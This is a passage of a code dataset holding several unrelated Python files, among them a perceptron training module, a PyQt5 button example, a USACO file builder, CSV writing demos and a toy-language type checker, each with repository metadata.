\n \n
\n
CNPJs Únicos x idênticos
\n
Porcentagem de campos com dados únicos x idênticos
\n
\n
\n \n
\n \n
\n
\n \n
\n
Contagem de Caracteres dos CNPJs
\n
Porcentagem de campos com 14 caracteres, mais de 14 e menos de 14 da \n soma das colunas NUM_CNPJ e NUM_COMP\n
\n
\n
\n \n
\n \n
\n
\n \n
\n
Razão Social Únicos x Idênticos
\n
Porcentagem de campos com dados únicos x idênticos
\n
\n
\n \n
\n \n
\n
\n
\n
\n
\n
\n\n\n'''\n\n f = open(relatorio + '/table_FNT.html','w', encoding='utf-8')\n f.write(html_string)\n f.close()\n\n print(f\"O Relatório de Validação da Tabela STG_FNT_ITT foi criado com sucesso!\")\n","sub_path":"SPRINT 5/codigos_desenvolvidos/fontes.py","file_name":"fontes.py","file_ext":"py","file_size_in_byte":24356,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"242028771","text":"# O(Nlogk) run-time and O(k) space-complexity.\nclass Solution:\n def topKFrequent(self, nums, k):\n \"\"\"\n :type nums: List[int]\n :type k: int\n :rtype: List[int]\n \"\"\"\n counts = collections.Counter(nums)\n heap = [counts.popitem()[::-1] for _ in range(k)]\n heapq.heapify(heap)\n for key, val in counts.items():\n if val > heap[0][0]:\n heapq.heapreplace(heap, (val, key))\n return sorted([x[1] for x in heap])\n \n","sub_path":"PriorityQueue/347_top_k_frequent_elements.py","file_name":"347_top_k_frequent_elements.py","file_ext":"py","file_size_in_byte":508,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"424021353","text":"# --------------------------------------------------------------------------------------------\n# Copyright (c) Microsoft Corporation. All rights reserved.\n# Licensed under the MIT License. See License.txt in the project root for license information.\n# --------------------------------------------------------------------------------------------\n\nimport sys\nimport os\nfrom subprocess import check_call, CalledProcessError\n\nroot_dir = os.path.abspath(os.path.join(os.path.abspath(__file__), '..', '..'))\n\nprint('Running dev setup...')\nprint('Root directory \\'{}\\'\\n'.format(root_dir))\n\ndef exec_command(command):\n try:\n print('Executing: ' + command)\n check_call(command.split(), cwd=root_dir)\n print()\n except CalledProcessError as err:\n print(err, file=sys.stderr)\n sys.exit(1)\n\n# install general requirements and azure-cli\nexec_command('python -m pip install --upgrade pip')\n\nif os.path.isfile('./requirements.txt'):\n exec_command('pip install -r requirements.txt')\n\n# upgrade to latest az-dev-cli\nexec_command(r'pip install --upgrade .\\azure-devops-extension')\n","sub_path":"scripts/dev_setup.py","file_name":"dev_setup.py","file_ext":"py","file_size_in_byte":1107,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"38322955","text":"from __future__ import print_function\nimport numpy as np\nimport sys\nimport copy\nimport time\nimport os\nimport amitgroup as ag\nimport pickle\n\n\n\n\ndef top_train(expi):\n\n \"\"\"\n Call two types of network training. One which\n updates perceptrons of one class against the rest\n and then moves on to other classes. The second which\n updates all the perceptrons at each iteration (this\n is more natural). The first will probably be removed at somepoint.\n\n Parameters\n ----------\n\n The input is an `experiment' class that has the training\n and test data as submembers (.ddtr, .ddte) a list of lists.\n len(ddtr) is number of classes. For each class len(ddtr[c]) is\n number of training points. If exp.pp.numtrain_per_class>0 then\n exactly that number of training points per class are used.\n exp.pp.slant=1 - deslant the digits.\n exp.out = output file for some printouts.\n exp.pp = parameter class for network training, stochastic svm training, part training. (TODO break pp into sub parameter classes)\n\n Returns\n -------\n\n The function add a list of lists of network classes into the input class and doesn't return anything. List length is number of classes.\n For each class list length is number of perceptrons. Each perceptron\n synapse matrix is given by a network class.\n\n \"\"\"\n expi.NO=[]\n if expi.pp.type==0:\n expi.NO.append(train_net(expi))\n else:\n expi.NO.append(all_at_one_top(expi))\n\n [C,e]=test_averages(expi)\n print(\"Test classification rate \", e)\n print(\"Finished Training\")\n\n\n\ndef extract_feature_matrix(ddt,s,num=0):\n\n \"\"\"\n\n Create one feature array from the features of a list of images.\n The feature for each image is flattened and added as a row of the array.\n\n Parameters\n ----------\n\n ddt - The list of images. s - a string denoting which level of features to use.\n (For now we only have V1)\n num=0 - number of images to extract if not all of them.\n\n Returns\n -------\n\n Returns the features array.\n\n \"\"\"\n\n if (num==0):\n l=len(ddt)\n else:\n l=num\n numfeat=ddt[0].features[s].size\n MM=np.zeros((l,numfeat), dtype=np.ubyte)\n i=0\n for i in range(l):\n MM[i,:]=ddt[i].features[s].flatten()\n return MM\n\ndef read_data_b(expi,numclass):\n\n \"\"\"\n\n Read training and test images from path 's' and process them for features\n put result in expi.ddtr, expi.ddte.\n\n if expi.pp.numtrain_per_class>0 extract exactly that number of training\n examples for each class. Otherwise just take first exp.pp.numtrain exaples\n from training et.\n if expi.pp.slant=1 deslant the images.\n\n Parameters\n ----------\n\n s-path, expi-experiment, numclass- number of classes.\n\n Returns\n -------\n\n Nothing.\n\n \"\"\"\n\n print('Hello')\n s=os.environ['HOME']+'/Desktop/Dropbox/'\n sstr=s+'/mnist_train'\n sste=s+'/mnist_test'\n expi.ddtr=[]\n expi.ddte=[]\n for i in range(numclass):\n bb=[]\n expi.ddtr.append(bb)\n cc=[]\n expi.ddte.append(cc)\n\n if (expi.pp.numtrain_per_class==0):\n for i in range(expi.pp.numtrain):\n tim=ag.io.load_imagep(sstr,i,True)\n tim.img=ag.io.process_im(tim.img, expi.pp.slant, expi.pp.DIM)\n feat=ag.features.bedges(np.double(tim.img),5,'box',expi.pp.spread)\n tim.features={'V1': feat}\n tr=tim.truth\n expi.ddtr[tr].append(tim)\n else:\n for c in range(numclass):\n i=0\n while len(expi.ddtr[c])expi.pp.theta\n H[:,d]=np.sum(temp,1)\n i=np.argmax(H,1);\n for d in range(numclass):\n CONF[c,d]=np.double(np.sum(i==d))\n\n print(np.sum(np.diag(CONF))/Ntot)\n return CONF\n\n\n\n \ndef train_net(expi):\n\n \"\"\"\n\n Train each class separately. So rerun over everything numclass times.\n This will probably be phased out.\n\n Paremters\n ---------\n\n expi - experiment.\n\n Returns\n -------\n\n Returns list of perceptrons (numperc) \n\n \"\"\"\n f = open(expi.pp.out,'w')\n numclass=len(expi.ddtr)\n CI=range(numclass)\n #np.random.shuffle(CI)\n NO=[None]*numclass\n for c in CI:\n f.write(str(CI[c])+'\\n')\n NO[CI[c]]=ff_mult_top(f,expi.pp,expi.ddtr,CI[c],expi.pp.numperc, expi.pp.numtrain_per_class)\n\n return NO\n\ndef stack_data(expi):\n numclass=len(expi.ddtr)\n N=expi.pp.numtrain_per_class\n if N==0:\n N=len(expi.ddtr[0])\n # Get the full data matrix for class 0\n X=extract_feature_matrix(expi.ddtr[0],'V1',N)\n Y=np.zeros((N,1), dtype=np.ubyte)\n # Stack up the data matrices for the other classes.\n for c in range(1,numclass):\n N=expi.pp.numtrain_per_class\n if N==0:\n N=len(expi.ddtr[c])\n print('Loading class ', c, N)\n X=np.vstack((X,extract_feature_matrix(expi.ddtr[c],'V1',N)))\n Y=np.vstack((Y,c*np.ones((N,1))))\n return X,Y\n\ndef all_at_one_top(expi):\n\n \"\"\"\n\n Train everything together. Each data point triggers\n potentiatiation of perceptrons of its class and depression\n on perceptrons of ALL other classes.\n\n Parameters\n ----------\n\n expi - experiment. \n expi.pp.numperc - number of perceptrons per class\n expi.pp.numtrain_per_class>0 - number of training data per class.\n\n Returns\n ------\n\n List of lists of perceptrons (one list for each class.)\n\n \"\"\"\n # stack data of all classes in one array, with an accompanying label array\n print('Going to stack')\n [X,Y]=stack_data(expi)\n # Call the training routine\n numclass=len(expi.ddtr)\n NN=ff_all_at_one(expi.pp,X,Y,expi.pp.numperc,numclass)\n return NN\n \ndef ff_all_at_one(pp,X,Y,numperc,numclass):\n\n \"\"\"\n\n Actually loop through a random ordering of the data\n and potentiate synapses to perceptron of same class \n depress synapses to perceptrons of other classes and\n potentiate feedback synapses for same class from perceptron to features.\n\n Parameters\n ----------\n\n out - file name for some printouts\n pp - parameters of learning (pltp, pltd, deltaP, deltaD\n X - feature data\n Y - class labels\n numperc - number of perceptrons per class\n numclass - number of classes.\n\n Returns\n -------\n\n List of list of perceptrons.\n\n \"\"\"\n\n #sys.stdout = open('out','w')\n Ntot=X.shape[0]\n numfeat=X.shape[1]\n print(Ntot, numfeat)\n\n # Synapses are positive and Jmid is the `middle'. Instead of being symmetric around 0.\n Jmid=np.ceil(pp.Jmax/2)\n # Feed forward synspases - initial value 1 -> 0.\n J=[]\n Jfb=[]\n for c in range(numclass):\n J.append(np.ones((numfeat,numperc), dtype=np.int8)*Jmid)\n # Feedback synapses\n Jfb.append(np.ones((numfeat,numperc), dtype=np.int8)*Jmid)\n # Iterate\n II=range(Ntot)\n h=np.zeros(numperc)\n rnumclass=range(numclass)\n rNtot=range(Ntot)\n for it in range(pp.numit):\n print('iteration ', it)\n # Random arrangement of examples. Stochastic gradient.\n np.random.shuffle(II)\n # Variables to keep track of changes\n up=0\n down=0\n # Loop over examples\n for i in rNtot:\n ii=II[i]\n XI=X[ii,:]==1\n XIz=X[ii,:]==0\n # Prepare for matrix multiplication.\n \n # Field at each perceptron for this class.\n \n for c in rnumclass:\n h=(np.dot(X[ii,:],J[c]-Jmid)).T\n #h.shape=[1,numperc] \n if Y[ii]==c:\n # Update in up direction.\n up+=potentiate_ff(pp,h,XI,J[c],Jmid)\n Jfb[c]=modify_fb(pp,XI,XIz,Jfb[c],Jmid)\n else:\n down+=depress_ff(pp,h,XI,J[c],Jmid)\n # up+down\n #f.write('updown '+str(np.double(up)+np.double(down))+'\\n')\n \n N=[]\n for c in range(numclass):\n NN=[]\n for p in range(numperc):\n NN.append(netout(J[c][:,p],Jfb[c][:,p]))\n N.append(NN)\n \n return N \n\n\n\ndef modify_fb(pp,XI,XIz,Jfb,Jmid):\n\n \"\"\"\n\n Potentiate or depress the feedback synapses.\n\n Parameters:\n ----------\n\n pp - learning parameters.\n XI - Which features are on.\n XIz - Which features are off.\n Jfb - array of synaptic values.\n Jmid = pp.Jmax/2\n\n Returns\n -------\n\n Returns update synaptic value array.\n\n \"\"\"\n # All feedback synapses connected to active features can be potentiated if less than max.\n\n XI.shape=XI.size\n temp=Jfb[XI,:]\n IJ=temp0\n g=temp[IJ]\n g-=np.random.rand(g.size)=pp.theta-pp.deltaD;\n if (len(np.nonzero(hii)[0])==0):\n return 0\n # Logical matrix of all synapses that can be depressed ...above depression threshold\n # and the feature is on. (Synapses with off features don't create a change.)\n imat=np.outer(XI,hii)\n if (len(J.shape)==1):\n imat=imat.flatten()\n\n Jh=J[imat];\n # If greater than minimal synaptic value\n IJ=Jh>0\n g=Jh[IJ]\n # Modify with stochastic ltd probability.\n RR=(np.random.rand(g.size)0:\n n=min(numtrain,len(dd[c]))\n\n XY.append(extract_feature_matrix(dd[c],'V1',n))\n\n\n N=XY[0].shape[0]\n\n for ii in ic:\n n=len(dd[ii])\n if numtrain>0:\n n=min(numtrain,len(dd[ii]))\n XY[0]=np.vstack((XY[0],extract_feature_matrix(dd[ii],'V1',n)))\n\n \n Ntot=XY[0].shape[0]\n Nbgd=Ntot-N\n XY.append(np.vstack((np.ones((N,1), dtype=np.ubyte),np.zeros((Nbgd,1), dtype=np.int8))))\n\n return XY\n\n\n# Train the network for each class.\ndef ff_mult_top(f,pp,ddtr,c,numperc, numtrain=0):\n if numtrain==0:\n numtrain=len(ddtr[c])\n # Rearrange data for this class with class at top of array and all the rest after.\n XY=rearrange(ddtr,c, numtrain)\n # Train class against the rest perceptron/s\n NO=ff_mult(pp,XY, numperc,f) \n return NO\n\ndef ff_mult(pp,XY,numperc,f):\n\n # Features\n X=XY[0]\n # Labels 1/0\n Y=XY[1]\n Ntot=X.shape[0]\n numfeat=X.shape[1]\n\n\n # Simple learing rule or field learning rule.\n # Synapses are positive and Jmid is the `middle'. Instead of being symmetric around 0.\n Jmid=np.ceil(pp.Jmax/2)\n # Feed forward synspases - initial value 1 -> 0.\n J=np.ones((numfeat,numperc))*Jmid\n # Feedback synapses\n Jfb=np.ones((numfeat,numperc))*Jmid\n II=range(Ntot)\n # Iterate\n for it in range(pp.numit):\n # Random arrangement of examples. Stochastic gradient.\n np.random.shuffle(II)\n # Variables to keep track of changesi\n up=0\n down=0\n # Loop over examples\n for i in range(Ntot):\n ii=II[i]\n # Field at each perceptron for this class.\n h=np.dot(X[ii,:],J-Jmid)\n # Set of active input features\n XI=X[ii,:]==1\n XIz=X[ii,:]==0\n # Prepare for matrix multiplication.\n h.shape=[1,numperc]\n # A class example\n if (Y[ii]==1):\n # Update in up direction.\n up+=potentiate_ff(pp,h,XI,J,Jmid)\n Jfb=modify_fb(pp,XI,XIz,Jfb,Jmid)\n else:\n # Update in down direction.\n down+=depress_ff(pp,h,XI,J,Jmid)\n # Report fraction of modified synapses (potentiated, depressed)\n f.write('updown '+str(np.double(up)+np.double(down))+'\\n')\n if up+down==0:\n break\n N=[]\n for p in range(numperc):\n N.append(netout(J[:,p],Jfb[:,p]))\n return N\n\n\nclass pars:\n \n d=None\n N=None\n Jmax=None\n pobj=None\n numit=None\n pltp=None\n pltd=None\n pinc=None\n stoch=None\n nofield=None\n theta=None\n deltaP=None\n deltaD=None\n pt=None\n sh=None\n min_edges=None\n part_size=None\n spread=None\n slant=None\n type=None\n numperc=None\n numtrain=None\n numtrain_per_class=None\n DIM=None\n out=None\n numparts=None\n\n def __init__(self):\n self.d=7200\n self.N=1000\n self.Jmax=2\n self.pobj=.5\n self.numit=5\n self.pltp=.01\n self.pltd=.01\n self.stoch=1\n self.nofield=0\n self.theta=0\n self.deltaP=5.\n self.deltaD=5.\n self.pt=0\n self.showing=100000\n self.min_edges=40\n self.part_size=7\n self.pinc=1\n self.spread=2\n self.special_class=-1\n self.reduction_factor=.9\n self.numperc=1\n self.numtrain=0\n self.numtrain_per_class=100\n self.type=1\n self.slant=1\n self.DIM=0\n self.out='out'\n self.numparts=0\n \n def write(self,f):\n pickle.dump(self,f)\n\n def write(self,s):\n f=open(s,'w')\n pickle.dump(self,f)\n f.close()\n\n def read(self,f):\n self=pickle.load(f)\n return self\n\n def read(self,s):\n f=open(s,'r')\n self=pickle.load(f)\n f.close()\n return self\n \ndef compress_nets(NN):\n\n for Nc in NN:\n for P in Nc:\n P.JJ=np.ubyte(P.JJ)\n\n \nclass experiment:\n ddtr=[]\n ddte=[]\n pp=[] \n NO=[]\n def __init__(self):\n self.pp=pars()\n \n \n def ecopy(self,ine):\n self.ddtr=ine.ddtr\n self.ddte=ine.ddte\n self.pp=copy.copy(ine.pp)\n\n def write_pars(self,s):\n self.pp.write(s)\n\n def read_pars(self,s):\n pr=pars()\n pr=pr.read(s)\n self.pp=pr\n \nclass netout:\n JJ=[];\n JJfb=[];\n def __init__(self,J,Jfb):\n self.JJ=np.ubyte(J)\n self.JJfb=np.ubyte(Jfb)\n\n\nclass modell:\n NN=[]\n par=[]\n def __init__(self,N,pp):\n self.NN=N\n self.par=pp\n \n \n\n\n \n \n\n\n","sub_path":"amitgroup/net/train_net.py","file_name":"train_net.py","file_ext":"py","file_size_in_byte":21053,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"312258611","text":"\r\nimport sys\r\n\r\nfrom PyQt5.QtWidgets import QApplication, QWidget, QPushButton\r\n\r\n\r\nclass Window(QWidget):\r\n \r\n def __init__(self):\r\n \r\n super().__init__()\r\n self.initUi()\r\n \r\n self.show()\r\n \r\n \r\n def initUi(self):\r\n \r\n self.setGeometry(500, 250, 400, 300)\r\n \r\n self.button = QPushButton('Signal test', self)\r\n self.button.setGeometry(160, 110, 80, 30)\r\n self.button.clicked.connect(self.on_button_clicked)\r\n \r\n \r\n def on_button_clicked(self):\r\n print('Button clicked')\r\n \r\n \r\n\r\n\r\ndef main(args):\r\n \r\n app = QApplication(args)\r\n window = Window()\r\n sys.exit(app.exec_())\r\n \r\n\r\nif __name__ == '__main__':\r\n main(sys.argv)\r\n","sub_path":"PyQt5-Examples/02_signals_and_slots/signals_slots.py","file_name":"signals_slots.py","file_ext":"py","file_size_in_byte":782,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"308899382","text":"# uncompyle6 version 3.7.4\n# Python bytecode 2.5 (62131)\n# Decompiled from: Python 3.6.9 (default, Apr 18 2020, 01:56:04) \n# [GCC 8.4.0]\n# Embedded file name: build/bdist.linux-i686/egg/bezel/graphics/stage.py\n# Compiled at: 2009-02-25 04:20:27\nfrom bezel.graphics.containers import Bin\n\nclass Stage(Bin):\n\n def __init__(self):\n super(Stage, self).__init__()\n self.scene_stack = []\n\n def update_child(self):\n if self.child is not None:\n self.child.deactivate()\n self.child.stage = None\n child = self.scene_stack[(-1)]\n child.stage = self\n self.child = child\n self.child.activate()\n self.invalidate()\n return\n\n def push(self, child):\n self.scene_stack.append(child)\n self.update_child()\n\n add = push\n\n def pop(self):\n assert len(self.scene_stack) > 0\n self.scene_stack.pop()\n self.update_child()\n\n def replace(self, child):\n self.scene_stack.pop()\n self.push(child)","sub_path":"pycfiles/bezel-1.0dev_r162-py2.5/stage.py","file_name":"stage.py","file_ext":"py","file_size_in_byte":1016,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"77762138","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\nfrom __future__ import division, print_function\n\nimport argparse\nimport os\n\narena_run_dir = os.path.expanduser('~/program/arena/tmp/arena')\nmain_file = os.path.join(arena_run_dir, 'release/Main.java')\nusaco_file = os.path.join(arena_run_dir, 'usaco/{}.java')\n\nhead_lines = '''\n/*\nID: paohui81\nLANG: JAVA\nPROG: {}\n*/\n'''\n\n\ndef build_args():\n parser = argparse.ArgumentParser(description='build usaco file')\n\n parser.add_argument('usaco_name', help='usaco name')\n\n args = parser.parse_args()\n return args\n\n\ndef build_usaco_file(usaco_name):\n with open(main_file) as input_fp, open(usaco_file, 'w') as output_fp:\n output_fp.write(head_lines)\n for line in input_fp:\n line = line.replace('System.in', 'new FileInputStream(\"{}.in\")'.format(usaco_name))\n line = line.replace('System.out', 'new FileOutputStream(\"{}.out\")'.format(usaco_name))\n line = line.replace('Main', '{}'.format(usaco_name))\n line = line.replace('main(String[] args)', 'main(String[] args) throws IOException')\n output_fp.write(line)\n\n\ndef main():\n args = build_args()\n usaco_name = args.usaco_name\n global usaco_file, head_lines\n usaco_file = usaco_file.format(usaco_name)\n head_lines = head_lines.format(usaco_name)\n print(usaco_file)\n\n usaco_dir = os.path.dirname(usaco_file)\n if not os.path.isdir(usaco_dir):\n os.makedirs(usaco_dir)\n\n build_usaco_file(usaco_name)\n\n\nif __name__ == '__main__':\n main()\n","sub_path":"libs/tools/build_usaco_file.py","file_name":"build_usaco_file.py","file_ext":"py","file_size_in_byte":1539,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"502156362","text":"#! python3\n\nimport csv\n\n# これは出力するやつ\nexample_file = open('example.csv')\nexample_reader = csv.reader(example_file)\n\nfor row in example_reader:\n print('Row #' + str(example_reader.line_num) + ' ' + str(row))\n\n# これは生成するやつ\noutput_file = open('output.csv', 'w', newline='')\noutput_writer = csv.writer(output_file)\noutput_writer.writerow(['spam', 'eggs', 'bacon', 'ham'])\noutput_writer.writerow(['Kikukawa', 'eggs', 'bacon', 'ham'])\noutput_writer.writerow([1, 2.4324, 5454, 10000000000000000000000000000])\noutput_file.close()\n\n# これはTSVだよ\ntsv_file = open('output.tsv', 'w', newline='')\nwriter = csv.writer(tsv_file, delimiter='\\t', lineterminator='\\n\\n')\nwriter.writerow(['aaa', 'bbb', 'ccc'])\nwriter.writerow(['ddd', 'eee', 'fff'])\nwriter.writerow(['ggg', 'hhh', 'iii'])\ntsv_file.close()","sub_path":"xxx/funwithcsv.py","file_name":"funwithcsv.py","file_ext":"py","file_size_in_byte":829,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"596725542","text":"#!/usr/bin/python\n\nimport AST\nimport MemoryStack\n\nclass TypeChecker(object):\n\tdef __init__(self):\n\t\tself.symbol_table = MemoryStack.MemoryStack(\"main_table\")\n\t#\n\t\t\n\tdef generic_visit(self, node): # Called if no explicit visitor function exists for a node.\n\t\taccepted = True\n\t\t\n\t\tif isinstance(node, list):\n\t\t\tfor elem in node:\n\t\t\t\taccepted = (self.generic_visit(elem) and accepted)\n\t\telse:\n\t\t\tscope_added = False\n\t\t\tis_function = False\n\t\t\t\n\t\t\tif(isinstance(node, AST.CompoundInstruction)):\n\t\t\t\tscope_added = True\n\t\t\t\t\n\t\t\t\tif(isinstance(node, AST.FunDefinition)):\n\t\t\t\t\tis_function = True\n\t\t\t\t\tsymbol = MemoryStack.FunSymbol(node.id, node.args, None)\n\t\t\t\t\tself.symbol_table.put(node.id.name, symbol)\n\t\t\t\t\t\n\t\t\t\tself.symbol_table.push_scope(node)\n\t\t\t\t\n\t\t\t\tif(is_function):\n\t\t\t\t\tfor arg in node.args:\n\t\t\t\t\t\tsymbol = MemoryStack.VariableSymbol(arg)\n\t\t\t\t\t\tself.symbol_table.put(arg.name, symbol)\n\t\t\t\t\n\t\t\tfor child in node.children:\n\t\t\t\tif isinstance(child, list):\n\t\t\t\t\tfor item in child:\n\t\t\t\t\t\tif isinstance(item, AST.Node):\n\t\t\t\t\t\t\taccepted = (self.generic_visit(item) and accepted)\n\t\t\t\telif isinstance(child, AST.Node):\n\t\t\t\t\taccepted = (self.generic_visit(child) and accepted)\n\t\t\t\n\t\t\taccepted = (node.visit(self.symbol_table) and accepted)\n\t\t\t\n\t\t\tif(scope_added):\n\t\t\t\tself.symbol_table.pop_scope()\n\t\t\n\t\treturn accepted\n\t#\n\t\t\t\n\n\tdef addToClass(cls):\n\t\tdef decorator(func):\n\t\t\tsetattr(cls,func.__name__,func)\n\t\t\treturn func\n\t\treturn decorator\n\t#\n\n#~ ---------- VISIT METHODS ---------- \n\t\t\n\t@addToClass(AST.Node)\n\tdef visit(self, symbol_table):\n\t\treturn True\n\t\t\n\t@addToClass(AST.BinExpr)\n\tdef visit(self, symbol_table):\n\t\taccepted = True\n\t\ttypes_unknown = False\n\t\t\n\t\tif(self.left.type == \"UNKNOWN\"):\n\t\t\tif(hasattr(self.left, \"name\")):\n\t\t\t\texpr = symbol_table.get(self.left.name)\n\t\t\t\tif(expr is None):\n\t\t\t\t\ttypes_unknown = True\n\t\t\t\t\tprint(\"Line [\" + str(self.lineno) + \"]: Unknown type (left expression)\")\n\t\t\t\telse:\n\t\t\t\t\tself.left.type = expr.type\n\t\t\telse:\n\t\t\t\ttypes_unknown = True\n\t\t\t\n\t\tif(self.right.type == \"UNKNOWN\"):\n\t\t\tif(hasattr(self.right, \"name\")):\n\t\t\t\texpr = symbol_table.get(self.right.name)\n\t\t\t\tif(expr is None):\n\t\t\t\t\ttypes_unknown = True\n\t\t\t\t\tprint(\"Line [\" + str(self.lineno) + \"]: Unknown type (right expression)\")\n\t\t\t\telse:\n\t\t\t\t\tself.right.type = expr.type\n\t\t\telse:\n\t\t\t\ttypes_unknown = True\n\t\t\n\t\tif(types_unknown):\n\t\t\tresult_type = \"UNKNOWN\"\n\t\t\taccepted = False\n\t\telse:\n\t\t\tresult_type = AST.Node.operation_results[self.op][self.left.type][self.right.type]\n\t\t\t\n\t\tif(result_type is None):\n\t\t\tself.type = \"UNKNOWN\"\n\t\t\taccepted = False\n\t\t\t\n\t\t\tprint(\"Line [\" + str(self.lineno) + \"]: Illegal binary expression!\")\n\t\telse:\t\n\t\t\tself.type = result_type\n\t\t\n\t\treturn accepted\n\t#\n\t\t\t\n\t@addToClass(AST.Declaration)\n\tdef visit(self, symbol_table):\n\t\taccepted = True\n\t\tid = self.left\n\t\tvalue = self.right\n\t\t\n\t\tif(symbol_table.get_within_scope(id.name) is not None):\n\t\t\taccepted = False\n\t\t\tprint(\"Line [\" + str(self.lineno) + \"]: Multiple declarations of the same variable [\" + id.name + \"]!\")\n\t\t\n\t\tif(id.type != \"UNKNOWN\"):\n\t\t\tsymbol = MemoryStack.VariableSymbol(id)\n\t\t\tsymbol_table.put(id.name, symbol)\n\t\telse:\n\t\t\tprint(\"Line [\" + str(self.lineno) + \"]: Unknown variable type!\")\n\t\t\n\t\tif(id.type != value.type):\n\t\t\tif(id.type == \"int\" and value.type == \"float\"):\n\t\t\t\tprint(\"Line [\" + str(self.lineno) + \"]: Warning! Implicit type cast (float -> int)!\")\n\t\t\telif(id.type != \"float\" or value.type != \"int\"):\n\t\t\t\taccepted = False\n\t\t\t\tprint(\"Line [\" + str(self.lineno) + \"]: Invalid variable definition (type mismatch)!\")\n\t\t\n\t\treturn accepted\n\t#\n\n\t@addToClass(AST.Const)\n\tdef visit(self, symbol_table):\n\t\taccepted = True\n\t\treturn accepted\n\t#\n\n\t@addToClass(AST.Id)\n\tdef visit(self, symbol_table):\n\t\taccepted = True\n\t\tvar_symbol = symbol_table.get(self.name)\n\t\tif(var_symbol is None):\n\t\t\taccepted = False\n\t\t\tprint(\"Line [\" + str(self.lineno) + \"]: No variable definition found [\" + self.name + \"]!\")\n\t\telse:\n\t\t\tself.type = var_symbol.type\n\t\t\n\t\treturn accepted\n\t#\n\n\t#~ --------------------- FUNCTIONS --------------------- \n\n\t@addToClass(AST.FunDefinition)\n\tdef visit(self, symbol_table):\n\t\taccepted = True\n\t\t\n\t\tif(self.body_expressions is None or len(self.body_expressions) == 0):\n\t\t\taccepted = False\n\t\t\tprint(\"Line [\" + str(self.lineno) + \"]: No function body expressions found!\")\n\t\telse:\n\t\t\treturn_expr = self.body_expressions[-1]\n\t\t\t\n\t\t\tif(not isinstance(return_expr, AST.ReturnInstr)):\n\t\t\t\taccepted = False\n\t\t\t\tprint(\"Line [\" + str(self.lineno) + \"]: No return expression in function [\" + self.id.name + \"] found!\")\n\t\t\telse:\n\t\t\t\tif(self.id.type != return_expr.type):\n\t\t\t\t\taccepted = False\n\t\t\t\t\tprint(\"Line [\" + str(return_expr.lineno) + \"]: Return expression type mismatch in function [\" + self.id.name + \"]!\")\n\t\t\n\t\treturn accepted\n\t#\n\t\t\t\t\t\n\t@addToClass(AST.FunCall)\n\tdef visit(self, symbol_table):\n\t\taccepted = True\n\t\tid = self.id\n\t\tfun_symbol = symbol_table.get(id.name)\n\t\t\n\t\tif(fun_symbol is None):\n\t\t\taccepted = False\n\t\t\tprint(\"Line [\" + str(self.lineno) + \"]: No function definition found (\" + id.name + \")!\")\n\t\telse:\n\t\t\tif(not isinstance(fun_symbol, MemoryStack.FunSymbol)):\n\t\t\t\taccepted = False\n\t\t\t\tprint(\"Line [\" + str(self.lineno) + \"]: Id [\" + id.name + \"] is not function id!\")\n\t\t\telse:\t\n\t\t\t\tself.type = fun_symbol.type\n\t\t\t\t\n\t\t\t\tif(len(fun_symbol.args) != len(self.args)):\n\t\t\t\t\taccepted = False\n\t\t\t\t\tprint(\"Line [\" + str(self.lineno) + \"]: Invalid number of arguments in function call!\")\n\t\t\t\telse:\n\t\t\t\t\tfuncall_args = self.args\n\t\t\t\t\tfundef_args = fun_symbol.args\n\t\t\t\t\t\n\t\t\t\t\tfor i in range(len(funcall_args)):\n\t\t\t\t\t\tif(funcall_args[i].type != fundef_args[i].type):\n\t\t\t\t\t\t\tif(fundef_args[i].type == \"int\" and funcall_args[i].type == \"float\"):\n\t\t\t\t\t\t\t\tprint(\"Line [\" + str(self.lineno) + \"]: Warning! Implicit type cast (float -> int)!\")\n\t\t\t\t\t\t\telif(fundef_args[i].type != \"float\" or funcall_args[i].type != \"int\"):\n\t\t\t\t\t\t\t\taccepted = False\n\t\t\t\t\t\t\t\tprint(\"Line [\" + str(self.lineno) + \"]: Invalid argument [\" + self.args[i].name + \"] type!\")\n\t\t\t\t\t\t\t\t\n\t\treturn accepted\n\t#\n\t\t\n\t#~ --------------------- INSTRUCTIONS --------------------- \n\t\n\t@addToClass(AST.AssignInstr)\n\tdef visit(self, symbol_table):\n\t\taccepted = True\n\t\tid = self.left\n\t\tvalue = self.right\n\t\t\n\t\tif(id.type != value.type):\n\t\t\tif(id.type == \"int\" and value.type == \"float\"):\n\t\t\t\tprint(\"Line [\" + str(self.lineno) + \"]: Warning! Implicit type cast (float -> int)!\")\n\t\t\telif(id.type != \"float\" or value.type != \"int\"):\n\t\t\t\taccepted = False\n\t\t\t\tprint(\"Line [\" + str(self.lineno) + \"]: Invalid variable definition (type mismatch)!\")\n\t\t\n\t\treturn accepted\n\t#\n\n\t@addToClass(AST.FlowControlInstr)\n\tdef visit_flow_control_instr(self, symbol_table):\n\t\taccepted = True\n\t\tcur_scope = symbol_table.peek_scope()\n\t\t\n\t\twhile((cur_scope is not None) and (not isinstance(cur_scope.owner, AST.LoopInstr))):\n\t\t\tcur_scope = cur_scope.get_parent_scope()\n\t\t\t\n\t\tif(cur_scope is None):\n\t\t\taccepted = False\n\t\t\tprint(\"Line [\" + str(self.lineno) + \"]: \" + self.name + \" instruction detected within a non-loop scope!\")\n\n\t\treturn accepted\n\t#\n\t\t\n\t@addToClass(AST.BreakInstr)\n\tdef visit(self, symbol_table):\n\t\treturn self.visit_flow_control_instr(symbol_table)\n\t#\n\t\t\n\t@addToClass(AST.ContinueInstr)\n\tdef visit(self, symbol_table):\n\t\treturn self.visit_flow_control_instr(symbol_table)\n\t#\n\n\t@addToClass(AST.PrintInstr)\n\tdef visit(self, symbol_table):\n\t\taccepted = True\n\t\treturn accepted\n\t#\n\n\t@addToClass(AST.ReturnInstr)\n\tdef visit(self, symbol_table):\n\t\taccepted = True\n\t\tself.type = self.expression.type\n\t\tcur_scope = symbol_table.peek_scope()\n\t\t\n\t\twhile((cur_scope is not None) and (not 